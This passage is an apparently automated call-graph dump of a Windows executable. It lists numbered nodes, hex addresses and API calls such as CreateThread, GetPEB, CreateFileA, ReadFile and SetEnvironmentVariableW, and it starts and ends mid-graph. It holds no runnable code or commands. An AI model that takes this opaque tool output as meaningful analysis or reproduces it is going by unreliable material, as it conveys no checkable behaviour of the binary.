14 API calls 9484->9468 9490 6cd3b2 9485->9490 9491 6cb757 __strnicoll 14 API calls 9486->9491 9492 6cd56f 48 API calls 9487->9492 9488 6cd40c 9489 6cb0cb __freea 14 API calls 9488->9489 9498 6cd414 9489->9498 9490->9477 9496 6cb807 __strnicoll 14 API calls 9490->9496 9490->9514 9491->9514 9492->9477 9493 6cd457 9494 6cd0c4 51 API calls 9493->9494 9493->9514 9495 6cd485 9494->9495 9497 6cb0cb __freea 14 API calls 9495->9497 9499 6cd3ce 9496->9499 9504 6cd441 9497->9504 9498->9504 9535 6cd0c4 9498->9535 9503 6cb0cb __freea 14 API calls 9499->9503 9500 6cd53f 9501 6cb0cb __freea 14 API calls 9500->9501 9501->9468 9503->9477 9504->9500 9504->9504 9507 6cb807 __strnicoll 14 API calls 9504->9507 9504->9514 9505 6cd438 9506 6cb0cb __freea 14 API calls 9505->9506 9506->9504 9508 6cd4d0 9507->9508 9509 6cd4d8 9508->9509 9510 6cd4e0 9508->9510 9512 6cb0cb __freea 14 API calls 9509->9512 9511 6c96ac ___std_exception_copy 48 API calls 9510->9511 9513 6cd4ec 9511->9513 9512->9514 9515 6cd564 9513->9515 9516 6cd4f3 9513->9516 9514->9484 9518 6c7d96 __strnicoll 11 API calls 9515->9518 9544 6cf9bc 9516->9544 9520 6cd56e 9518->9520 9521 6cd539 9524 6cb0cb __freea 14 API calls 9521->9524 9522 6cd51a 9523 6cb757 __strnicoll 14 API calls 9522->9523 9525 6cd51f 9523->9525 9524->9500 9526 6cb0cb __freea 14 API calls 9525->9526 9526->9514 9528 6cd57c 9527->9528 9529 6cd35e 9527->9529 9559 6cd5de 9528->9559 9529->9477 9529->9478 9529->9479 9532 6cd3fc 9531->9532 9534 6cd59f 9531->9534 9532->9488 9532->9493 9534->9532 9574 6cf8cb 9534->9574 9536 6cd0ec 9535->9536 9537 6cd0d1 9535->9537 9539 6cd0fb 9536->9539 9608 6cf6f8 9536->9608 9537->9536 9538 6cd0dd 9537->9538 9540 6cb757 __strnicoll 14 API calls 9538->9540 9615 6cf72b 9539->9615 9543 6cd0e2 std::_Xinvalid_argument 9540->9543 9543->9505 9627 6cc274 9544->9627 9549 6cfa2f 9552 6cb0cb __freea 14 API calls 9549->9552 9553 6cfa3b 9549->9553 9550 6cc274 48 API calls 9551 6cfa0c 9550->9551 9555 6cc30c 17 API calls 9551->9555 9552->9553 9554 6cb0cb __freea 14 API calls 9553->9554 9556 6cd514 9553->9556 9554->9556 9557 6cfa19 9555->9557 9556->9521 9556->9522 9557->9549 9558 6cfa23 SetEnvironmentVariableW 9557->9558 9558->9549 9560 6cd5ec 9559->9560 9561 6cd5f1 9559->9561 9560->9529 9562 6cb807 __strnicoll 14 API calls 9561->9562 9568 6cd60e 9562->9568 9563 6cd67c 9564 6c835d CallUnexpected 48 API calls 9563->9564 9565 6cd681 9564->9565 9567 6c7d96 __strnicoll 11 API calls 9565->9567 9566 6cb0cb __freea 14 API calls 9566->9560 9569 6cd68d 9567->9569 9568->9563 9568->9565 9570 6cb807 __strnicoll 14 API calls 9568->9570 9571 6cb0cb __freea 14 API calls 9568->9571 9572 6c96ac ___std_exception_copy 48 API calls 9568->9572 9573 6cd66b 9568->9573 9570->9568 9571->9568 9572->9568 9573->9566 9575 6cf8df 9574->9575 9576 6cf8d9 9574->9576 9575->9534 9577 6d0199 9576->9577 9578 6d01e1 9576->9578 9580 6d019f 9577->9580 9581 6d01bc 9577->9581 9590 6d01f7 9578->9590 9582 6cb757 __strnicoll 14 API calls 9580->9582 9585 6cb757 __strnicoll 14 API calls 9581->9585 9589 6d01da 9581->9589 9583 6d01a4 9582->9583 9584 6c7d69 __strnicoll 48 API calls 9583->9584 9588 6d01af 9584->9588 9586 6d01cb 9585->9586 9587 6c7d69 __strnicoll 48 API calls 9586->9587 9587->9588 9588->9534 9589->9534 9591 6d0207 9590->9591 9592 6d0221 9590->9592 9593 6cb757 __strnicoll 14 API calls 9591->9593 9594 6d0229 9592->9594 9595 6d0240 9592->9595 9598 6d020c 9593->9598 9599 6cb757 __strnicoll 14 API calls 9594->9599 9596 6d024c 9595->9596 9597 6d0263 9595->9597 9601 6cb757 __strnicoll 14 API calls 9596->9601 9605 6ca8c8 __strnicoll 48 API calls 9597->9605 9607 6d0217 9597->9607 9602 6c7d69 __strnicoll 48 API calls 9598->9602 9600 6d022e 9599->9600 9603 6c7d69 __strnicoll 48 API calls 9600->9603 9604 6d0251 9601->9604 9602->9607 9603->9607 9606 6c7d69 __strnicoll 48 API calls 9604->9606 9605->9607 9606->9607 9607->9588 9609 6cf718 HeapSize 9608->9609 9610 6cf703 9608->9610 9609->9539 9611 6cb757 __strnicoll 14 API calls 9610->9611 9612 6cf708 9611->9612 9613 6c7d69 __strnicoll 48 API calls 9612->9613 9614 6cf713 9613->9614 9614->9539 9616 6cf738 9615->9616 9617 6cf743 9615->9617 9618 6cbc45 15 API calls 9616->9618 9619 6cf74b 9617->9619 9625 6cf754 __strnicoll 9617->9625 9623 6cf740 9618->9623 9620 6cb0cb __freea 14 API calls 9619->9620 9620->9623 9621 6cf77e HeapReAlloc 9621->9623 9621->9625 9622 6cf759 9624 6cb757 __strnicoll 14 API calls 9622->9624 9623->9543 9624->9623 9625->9621 9625->9622 9626 6c7207 __strnicoll 2 API calls 9625->9626 9626->9625 9628 6ca8c8 __strnicoll 48 API calls 9627->9628 9629 6cc286 9628->9629 9631 6cc298 9629->9631 9635 6c9a96 9629->9635 9632 6cc30c 9631->9632 9641 6cc4e2 9632->9641 9638 6c9f23 9635->9638 9639 6c9e9e __strnicoll 5 API calls 9638->9639 9640 6c9a9e 9639->9640 9640->9631 9642 6cc50a 9641->9642 9643 6cc4f0 9641->9643 9645 6cc530 9642->9645 9646 6cc511 9642->9646 9659 6cc2f2 9643->9659 9648 6cbdee ___scrt_uninitialize_crt MultiByteToWideChar 9645->9648 9647 6cc324 9646->9647 9663 6cc2b3 9646->9663 9647->9549 9647->9550 9650 6cc53f 9648->9650 9651 6cc546 GetLastError 9650->9651 9653 6cc56c 9650->9653 9655 6cc2b3 15 API calls 9650->9655 9668 6cb77d 9651->9668 9653->9647 9656 6cbdee ___scrt_uninitialize_crt MultiByteToWideChar 9653->9656 9655->9653 9658 6cc583 9656->9658 9657 6cb757 __strnicoll 14 API calls 9657->9647 9658->9647 9658->9651 9660 6cc2fd 9659->9660 9661 6cc305 9659->9661 9662 6cb0cb __freea 14 API calls 9660->9662 9661->9647 9662->9661 9664 6cc2f2 14 API calls 9663->9664 9665 6cc2c1 9664->9665 9673 6cc255 9665->9673 9676 6cb76a 9668->9676 9670 6cb788 __dosmaperr 9671 6cb757 __strnicoll 14 API calls 9670->9671 9672 6cb79b 9671->9672 9672->9657 9674 6cbc45 15 API calls 9673->9674 9675 6cc262 9674->9675 9675->9647 9677 6ca15b __strnicoll 14 API calls 9676->9677 9678 6cb76f 9677->9678 9678->9670 9680 6bce50 std::_Throw_Cpp_error 9679->9680 9698 6c3b60 9680->9698 9683 6bce70 9690 6bce93 9683->9690 9684 6bd449 9685 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9684->9685 9686 6bcdd5 CreateEllipticRgn 9685->9686 9692 6bd4a0 9686->9692 9687 6bcf87 GetCurrentThreadId 9687->9690 9688 6c441d std::_Throw_Cpp_error 52 API calls 9688->9687 9690->9684 9690->9687 9690->9688 9691 6c441d 52 API calls std::_Throw_Cpp_error 9690->9691 10055 6c4952 WaitForSingleObjectEx 9690->10055 9691->9690 9693 6bd4c0 9692->9693 9695 6bd528 9693->9695 10060 6c846b 9693->10060 9696 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9695->9696 9697 6bce14 9696->9697 9697->8891 9699 6c3b8b std::_Throw_Cpp_error 9698->9699 9712 6c3cc0 9699->9712 9701 6c3b9a 9721 6c6ce6 9701->9721 9703 6c3c84 9740 6c441d 9703->9740 9705 6c3c9a 9746 6c3e30 9705->9746 9706 6c3bea 9706->9703 9706->9705 9736 6c3de0 9706->9736 9710 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9711 6bcdc7 9710->9711 9711->9683 9752 6c41c6 9712->9752 9714 6c3cef std::_Throw_Cpp_error 9766 6c3f00 9714->9766 9719 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9720 6c3d32 9719->9720 9720->9701 9722 6c6d07 9721->9722 9723 6c6cf3 9721->9723 9790 6c6d77 9722->9790 9725 6cb757 __strnicoll 14 API calls 9723->9725 9727 6c6cf8 9725->9727 9729 6c7d69 __strnicoll 48 API calls 9727->9729 9728 6c6d1c CreateThread 9730 6c6d3b GetLastError 9728->9730 9731 6c6d47 9728->9731 9807 6c6e00 9728->9807 9732 6c6d03 9729->9732 9733 6cb77d __dosmaperr 14 API calls 9730->9733 9799 6c6dc7 9731->9799 9732->9706 9733->9731 9737 6c3e0c 9736->9737 9738 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9737->9738 9739 6c3e19 9738->9739 9739->9706 9741 6c4433 std::_Throw_Cpp_error 9740->9741 9947 6c467d 9741->9947 9751 6c3e58 std::_Throw_Cpp_error 9746->9751 9747 6c3ee3 9748 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9747->9748 9749 6c3ca2 9748->9749 9749->9710 9751->9747 10051 6c40f0 9751->10051 9756 6c41cb 9752->9756 9754 6c41e5 9754->9714 9755 6c7207 __strnicoll 2 API calls 9755->9756 9756->9754 9756->9755 9758 6c41e7 std::_Throw_Cpp_error 9756->9758 9775 6c83c7 9756->9775 9757 6c49c1 std::_Throw_Cpp_error 9759 6c59fc std::_Xinvalid_argument RaiseException 9757->9759 9758->9757 9782 6c59fc 9758->9782 9761 6c49de IsProcessorFeaturePresent 9759->9761 9763 6c49f4 9761->9763 9785 6c4ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9763->9785 9765 6c4ad7 9765->9714 9786 6c3fb0 9766->9786 9769 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9770 6c3d0e 9769->9770 9771 6c3f60 9770->9771 9772 6c3f95 9771->9772 9773 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9772->9773 9774 6c3d22 9773->9774 9774->9719 9780 6cbc45 __strnicoll 9775->9780 9776 6cbc83 9778 6cb757 __strnicoll 14 API calls 9776->9778 9777 6cbc6e RtlAllocateHeap 9779 6cbc81 9777->9779 9777->9780 9778->9779 9779->9756 9780->9776 9780->9777 9781 6c7207 __strnicoll 2 API calls 9780->9781 9781->9780 9783 6c5a43 RaiseException 9782->9783 9784 6c5a16 9782->9784 9783->9757 9784->9783 9785->9765 9787 6c3fe2 std::_Throw_Cpp_error 9786->9787 9788 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9787->9788 9789 6c3f36 9788->9789 9789->9769 9791 6cb807 __strnicoll 14 API calls 9790->9791 9792 6c6d88 9791->9792 9793 6cb0cb __freea 14 API calls 9792->9793 9794 6c6d95 9793->9794 9795 6c6d9c GetModuleHandleExW 9794->9795 9796 6c6db9 9794->9796 9795->9796 9797 6c6dc7 16 API calls 9796->9797 9798 6c6d13 9797->9798 9798->9728 9798->9731 9800 6c6dd3 9799->9800 9806 6c6d52 9799->9806 9801 6c6dd9 CloseHandle 9800->9801 9802 6c6de2 9800->9802 9801->9802 9803 6c6de8 FreeLibrary 9802->9803 9804 6c6df1 9802->9804 9803->9804 9805 6cb0cb __freea 14 API calls 9804->9805 9805->9806 9806->9706 9808 6c6e0c __FrameHandler3::FrameUnwindToState 9807->9808 9809 6c6e20 9808->9809 9810 6c6e13 GetLastError ExitThread 9808->9810 9811 6ca00a _unexpected 48 API calls 9809->9811 9812 6c6e25 9811->9812 9823 6cb976 9812->9823 9815 6c6e3c 9827 6c3d40 9815->9827 9824 6c6e30 9823->9824 9825 6cb986 CallUnexpected 9823->9825 9824->9815 9838 6c9cea 9824->9838 9825->9824 9844 6c9d93 9825->9844 9828 6c3f60 5 API calls 9827->9828 9829 6c3d6d std::_Throw_Cpp_error 9828->9829 9847 6c40a0 9829->9847 9834 6c3e30 5 API calls 9835 6c3da6 9834->9835 9836 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9835->9836 9837 6c3db5 9836->9837 9841 6c6d69 9837->9841 9839 6c9e9e __strnicoll 5 API calls 9838->9839 9840 6c9d06 9839->9840 9840->9815 9935 6c6e7e 9841->9935 9845 6c9e9e __strnicoll 5 API calls 9844->9845 9846 6c9daf 9845->9846 9846->9824 9855 6bcd10 GetPEB 9847->9855 9850 6c48cb GetCurrentThreadId 9927 6c4c86 9850->9927 9852 6c48e4 __Mtx_unlock __Cnd_broadcast 9930 6c4c92 9852->9930 9862 6c84a7 9855->9862 9860 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9861 6bcd82 9860->9861 9861->9850 9863 6c84ba __strnicoll 9862->9863 9877 6c8537 9863->9877 9866 6c7fd7 __strnicoll 48 API calls 9867 6bcd62 9866->9867 9868 6bc860 9867->9868 9875 6bc890 9868->9875 9870 6bcced 9871 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9870->9871 9873 6bccf9 9871->9873 9873->9860 9875->9870 9901 6bbeb0 CreateFileA 9875->9901 9911 6b86c0 9875->9911 9918 6b1000 9875->9918 9924 6b8ea0 9875->9924 9878 6c8567 9877->9878 9879 6c8594 9878->9879 9880 6c8576 9878->9880 9892 6c856b 9878->9892 9882 6c85a1 9879->9882 9883 6c84de ___scrt_uninitialize_crt 48 API calls 9879->9883 9881 6c7f12 __strnicoll 29 API calls 9880->9881 9881->9892 9885 6c85d9 9882->9885 9886 6c85bb 9882->9886 9883->9882 9884 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9887 6c84cc 9884->9887 9889 6c85ed 9885->9889 9890 6c8769 9885->9890 9888 6cda19 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9886->9888 9887->9866 9888->9892 9891 6c8687 9889->9891 9889->9892 9897 6c8631 9889->9897 9890->9892 9893 6cd131 ___scrt_uninitialize_crt WideCharToMultiByte 9890->9893 9894 6cd131 ___scrt_uninitialize_crt WideCharToMultiByte 9891->9894 9892->9884 9893->9892 9895 6c869a 9894->9895 9895->9892 9898 6c86b3 GetLastError 9895->9898 9896 6cd131 ___scrt_uninitialize_crt WideCharToMultiByte 9896->9892 9897->9896 9898->9892 9899 6c86c2 9898->9899 9899->9892 9900 6cd131 ___scrt_uninitialize_crt WideCharToMultiByte 9899->9900 9900->9899 9904 6bbf29 9901->9904 9902 6bc021 GetFileSize 9902->9904 9903 6bc083 ReadFile 9903->9904 9904->9902 9904->9903 9905 6bc12c CloseHandle 9904->9905 9906 6bc059 CloseHandle 9904->9906 9907 6bc14b 9904->9907 9909 6bc10d CloseHandle 9904->9909 9905->9904 9906->9904 9908 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9907->9908 9910 6bc160 9908->9910 9909->9904 9910->9875 9916 6b8783 std::_Throw_Cpp_error 9911->9916 9912 6b8dd8 9913 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9912->9913 9914 6b8de8 9913->9914 9914->9875 9915 6be9b0 5 API calls std::_Throw_Cpp_error 9915->9916 9916->9912 9916->9915 9917 6bea10 51 API calls std::_Throw_Cpp_error 9916->9917 9917->9916 9919 6b1041 9918->9919 9920 6b7eb0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9919->9920 9921 6b1451 9920->9921 9922 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9921->9922 9923 6b7e16 9922->9923 9923->9875 9925 6bd560 std::_Throw_Cpp_error 48 API calls 9924->9925 9926 6b8eb6 9925->9926 9926->9875 9933 6c51de EnterCriticalSection 9927->9933 9929 6c4c90 9929->9852 9934 6c51ec LeaveCriticalSection 9930->9934 9932 6c3d9e 9932->9834 9933->9929 9934->9932 9936 6ca15b __strnicoll 14 API calls 9935->9936 9937 6c6e89 9936->9937 9938 6c6ecb ExitThread 9937->9938 9939 6c6ea2 9937->9939 9944 6c9d25 9937->9944 9941 6c6eb5 9939->9941 9942 6c6eae CloseHandle 9939->9942 9941->9938 9943 6c6ec1 FreeLibraryAndExitThread 9941->9943 9942->9941 9943->9938 9945 6c9e9e __strnicoll 5 API calls 9944->9945 9946 6c9d3e 9945->9946 9946->9939 9948 6c4689 __EH_prolog3_GS 9947->9948 9949 6b86c0 std::_Throw_Cpp_error 51 API calls 9948->9949 9950 6c469d 9949->9950 9957 6c45a6 9950->9957 9975 6c42e6 9957->9975 9959 6c45d7 9979 6c4533 9959->9979 9962 6bd560 std::_Throw_Cpp_error 48 API calls 9963 6c45f9 9962->9963 9964 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9963->9964 9965 6c4618 9964->9965 9966 6bd560 9965->9966 9970 6bd584 std::_Throw_Cpp_error 9966->9970 9967 6bd6bf std::_Throw_Cpp_error 9968 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9967->9968 9969 6bd6f5 9968->9969 9972 6c4bd9 9969->9972 9970->9967 10048 6bd780 9970->10048 9973 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9972->9973 9974 6c4be3 9973->9974 9974->9974 9976 6c42fe 9975->9976 9978 6c4305 CatchIt 9976->9978 9991 6bf980 9976->9991 9978->9959 9980 6c453f __EH_prolog3_GS 9979->9980 9982 6c455e std::_Throw_Cpp_error 9980->9982 10018 6c434e 9980->10018 9983 6c434e std::_Throw_Cpp_error 51 API calls 9982->9983 9984 6c4583 9983->9984 9985 6bd560 std::_Throw_Cpp_error 48 API calls 9984->9985 9986 6c458b std::_Throw_Cpp_error 9985->9986 9987 6bd560 std::_Throw_Cpp_error 48 API calls 9986->9987 9988 6c459e 9987->9988 9989 6c4bd9 std::_Throw_Cpp_error 5 API calls 9988->9989 9990 6c45a5 std::domain_error::domain_error 9989->9990 9990->9962 9993 6bf9a4 9991->9993 9994 6bfeac 9993->9994 9998 6bff00 9993->9998 10006 6c0ff0 9993->10006 9995 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9994->9995 9996 6bfebc 9995->9996 9996->9978 10004 6bffa3 9998->10004 9999 6c0ff0 21 API calls std::_Throw_Cpp_error 9999->10004 10000 6c0642 10001 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 10000->10001 10002 6c0fc0 10001->10002 10002->9993 10004->9999 10004->10000 10009 6c1010 10004->10009 10013 6c7d79 10004->10013 10007 6c41c6 std::_Throw_Cpp_error 21 API calls 10006->10007 10008 6c1007 10007->10008 10008->9993 10010 6c101e std::_Throw_Cpp_error 10009->10010 10011 6c59fc std::_Xinvalid_argument RaiseException 10010->10011 10012 6c1036 10011->10012 10014 6c809f __strnicoll 48 API calls 10013->10014 10015 6c7d88 10014->10015 10016 6c7d96 __strnicoll 11 API calls 10015->10016 10017 6c7d95 10016->10017 10019 6c438f 10018->10019 10021 6c4365 CatchIt 10018->10021 10022 6c476d 10019->10022 10021->9982 10023 6c4828 10022->10023 10024 6c4792 10022->10024 10045 6bf170 10023->10045 10033 6bf4d0 10024->10033 10029 6bf980 std::_Throw_Cpp_error 51 API calls 10030 6c47ae CatchIt 10029->10030 10032 6c47fa CatchIt 10030->10032 10039 6bd7f0 10030->10039 10032->10021 10034 6bf718 10033->10034 10035 6bf2e0 std::_Throw_Cpp_error 5 API calls 10034->10035 10036 6bf94d 10034->10036 10035->10034 10037 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 10036->10037 10038 6bf960 10037->10038 10038->10029 10041 6bd8d2 10039->10041 10040 6be5ad std::_Throw_Cpp_error 10042 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 10040->10042 10041->10040 10044 6be600 std::_Throw_Cpp_error 48 API calls 10041->10044 10043 6be5d5 10042->10043 10043->10032 10044->10041 10046 6c4846 std::_Xinvalid_argument 50 API calls 10045->10046 10047 6bf182 10046->10047 10049 6bd7f0 std::_Throw_Cpp_error 48 API calls 10048->10049 10050 6bd7ab 10049->10050 10050->9970 10052 6c4114 10051->10052 10053 6c4241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 10052->10053 10054 6c4196 10053->10054 10054->9751 10056 6c4968 GetExitCodeThread 10055->10056 10057 6c499a 10055->10057 10056->10057 10058 6c4979 CloseHandle 10056->10058 10057->9690 10058->9690 10061 6c8477 __FrameHandler3::FrameUnwindToState 10060->10061 10062 6ca00a _unexpected 48 API calls 10061->10062 10063 6c847c 10062->10063 10064 6c835d CallUnexpected 48 API calls 10063->10064 10065 6c84a6 10064->10065 10067 6c6a7d 10066->10067 10068 6c6a8f ___scrt_uninitialize_crt 10066->10068 10069 6c6a8b 10067->10069 10071 6cb4a7 10067->10071 10068->8905 10069->8905 10074 6cb5d2 10071->10074 10077 6cb6ab 10074->10077 10078 6cb6b7 __FrameHandler3::FrameUnwindToState 10077->10078 10085 6c8161 EnterCriticalSection 10078->10085 10080 6cb6c1 ___scrt_uninitialize_crt 10081 6cb72d 10080->10081 10086 6cb61f 10080->10086 10094 6cb74b 10081->10094 10085->10080 10087 6cb62b __FrameHandler3::FrameUnwindToState 10086->10087 10097 6c6aef EnterCriticalSection 10087->10097 10089 6cb635 ___scrt_uninitialize_crt 10093 6cb66e 10089->10093 10098 6cb4b0 10089->10098 10111 6cb69f 10093->10111 10210 6c8178 LeaveCriticalSection 10094->10210 10096 6cb4ae 10096->10069 10097->10089 10099 6cb4c5 __strnicoll 10098->10099 10100 6cb4cc 10099->10100 10101 6cb4d7 10099->10101 10102 6cb5d2 ___scrt_uninitialize_crt 77 API calls 10100->10102 10114 6cb515 10101->10114 10104 6cb4d2 10102->10104 10106 6c7fd7 __strnicoll 48 API calls 10104->10106 10107 6cb50f 10106->10107 10107->10093 10109 6cb4f8 10127 6ce11f 10109->10127 10209 6c6b03 LeaveCriticalSection 10111->10209 10113 6cb68d 10113->10080 10115 6cb52e 10114->10115 10116 6cb4e1 10114->10116 10115->10116 10117 6cd936 ___scrt_uninitialize_crt 48 API calls 10115->10117 10116->10104 10120 6cd936 10116->10120 10118 6cb54a 10117->10118 10138 6ce45a 10118->10138 10121 6cd957 10120->10121 10122 6cd942 10120->10122 10121->10109 10123 6cb757 __strnicoll 14 API calls 10122->10123 10124 6cd947 10123->10124 10125 6c7d69 __strnicoll 48 API calls 10124->10125 10126 6cd952 10125->10126 10126->10109 10128 6ce13d 10127->10128 10129 6ce130 10127->10129 10131 6ce186 10128->10131 10133 6ce164 10128->10133 10130 6cb757 __strnicoll 14 API calls 10129->10130 10137 6ce135 10130->10137 10132 6cb757 __strnicoll 14 API calls 10131->10132 10134 6ce18b 10132->10134 10179 6ce19c 10133->10179 10136 6c7d69 __strnicoll 48 API calls 10134->10136 10136->10137 10137->10104 10140 6ce466 __FrameHandler3::FrameUnwindToState 10138->10140 10139 6ce46e 10139->10116 10140->10139 10141 6ce4a7 10140->10141 10143 6ce4ed 10140->10143 10142 6c7f12 __strnicoll 29 API calls 10141->10142 10142->10139 10149 6cd8d7 EnterCriticalSection 10143->10149 10145 6ce4f3 10146 6ce511 10145->10146 10150 6ce23e 10145->10150 10176 6ce563 10146->10176 10149->10145 10151 6ce266 10150->10151 10174 6ce289 ___scrt_uninitialize_crt 10150->10174 10152 6ce26a 10151->10152 10154 6ce2c5 10151->10154 10153 6c7f12 __strnicoll 29 API calls 10152->10153 10153->10174 10155 6ce2e3 10154->10155 10156 6cfa51 ___scrt_uninitialize_crt 50 API calls 10154->10156 10157 6ce56b ___scrt_uninitialize_crt 49 API calls 10155->10157 10156->10155 10158 6ce2f5 10157->10158 10159 6ce2fb 10158->10159 10160 6ce342 10158->10160 10163 6ce32a 10159->10163 10164 6ce303 10159->10164 10161 6ce3ab WriteFile 10160->10161 10162 6ce356 10160->10162 10165 6ce3cd GetLastError 10161->10165 10161->10174 10167 6ce35e 10162->10167 10168 6ce397 10162->10168 10166 6ce5e8 ___scrt_uninitialize_crt 54 API calls 10163->10166 10171 6ce9af ___scrt_uninitialize_crt 6 API calls 10164->10171 10164->10174 10165->10174 10166->10174 10169 6ce383 10167->10169 10170 6ce363 10167->10170 10172 6cea17 ___scrt_uninitialize_crt 7 API calls 10168->10172 10173 6cebdb ___scrt_uninitialize_crt 8 API calls 10169->10173 10170->10174 10175 6ceaf2 ___scrt_uninitialize_crt 7 API calls 10170->10175 10171->10174 10172->10174 10173->10174 10174->10146 10175->10174 10177 6cd8fa ___scrt_uninitialize_crt LeaveCriticalSection 10176->10177 10178 6ce569 10177->10178 10178->10139 10180 6ce1a8 __FrameHandler3::FrameUnwindToState 10179->10180 10192 6cd8d7 EnterCriticalSection 10180->10192 10182 6ce1b7 10183 6ce1fc 10182->10183 10193 6cd68e 10182->10193 10185 6cb757 __strnicoll 14 API calls 10183->10185 10187 6ce203 10185->10187 10186 6ce1e3 FlushFileBuffers 10186->10187 10188 6ce1ef GetLastError 10186->10188 10206 6ce232 10187->10206 10189 6cb76a __dosmaperr 14 API calls 10188->10189 10189->10183 10192->10182 10194 6cd69b 10193->10194 10195 6cd6b0 10193->10195 10196 6cb76a __dosmaperr 14 API calls 10194->10196 10197 6cb76a __dosmaperr 14 API calls 10195->10197 10200 6cd6d5 10195->10200 10198 6cd6a0 10196->10198 10201 6cd6e0 10197->10201 10199 6cb757 __strnicoll 14 API calls 10198->10199 10202 6cd6a8 10199->10202 10200->10186 10203 6cb757 __strnicoll 14 API calls 10201->10203 10202->10186 10204 6cd6e8 10203->10204 10205 6c7d69 __strnicoll 48 API calls 10204->10205 10205->10202 10207 6cd8fa ___scrt_uninitialize_crt LeaveCriticalSection 10206->10207 10208 6ce21b 10207->10208 10208->10137 10209->10113 10210->10096 8761 6bbe70 8762 6bbe9b 8761->8762 8765 6c6ed5 8762->8765 8768 6c7020 8765->8768 8769 6c704d 8768->8769 8770 6c705f 8768->8770 8795 6c53ec GetModuleHandleW 8769->8795 8780 6c71ba 8770->8780 8775 6bbeaf 8779 6c70b1 8781 6c71c6 __FrameHandler3::FrameUnwindToState 8780->8781 8803 6c8161 EnterCriticalSection 8781->8803 8783 6c71d0 8804 6c70b7 8783->8804 8785 6c71dd 8808 6c71fb 8785->8808 8788 6c6fef 8833 6c6fd6 8788->8833 8790 6c6ff9 8791 6c700d 8790->8791 8792 6c6ffd GetCurrentProcess TerminateProcess 8790->8792 8793 6c6f54 CallUnexpected 3 API calls 8791->8793 8792->8791 8794 6c7015 ExitProcess 8793->8794 8796 6c53f8 8795->8796 8796->8770 8797 6c6f54 GetModuleHandleExW 8796->8797 8798 6c6fb4 8797->8798 8799 6c6f93 GetProcAddress 8797->8799 8801 6c6fba FreeLibrary 8798->8801 8802 6c6fc3 8798->8802 8799->8798 8800 6c6fa7 8799->8800 8800->8798 8801->8802 8802->8770 8803->8783 8805 6c70c3 __FrameHandler3::FrameUnwindToState CallUnexpected 8804->8805 8806 6c7127 CallUnexpected 8805->8806 8811 6c776b 8805->8811 8806->8785 8832 6c8178 LeaveCriticalSection 8808->8832 8810 6c7096 8810->8775 8810->8788 8812 6c7777 __EH_prolog3 8811->8812 8815 6c79f6 8812->8815 8814 6c779e CallUnexpected 8814->8806 8816 6c7a02 __FrameHandler3::FrameUnwindToState 8815->8816 8823 6c8161 EnterCriticalSection 8816->8823 8818 6c7a10 8824 6c78c1 8818->8824 8823->8818 8825 6c78d8 8824->8825 8826 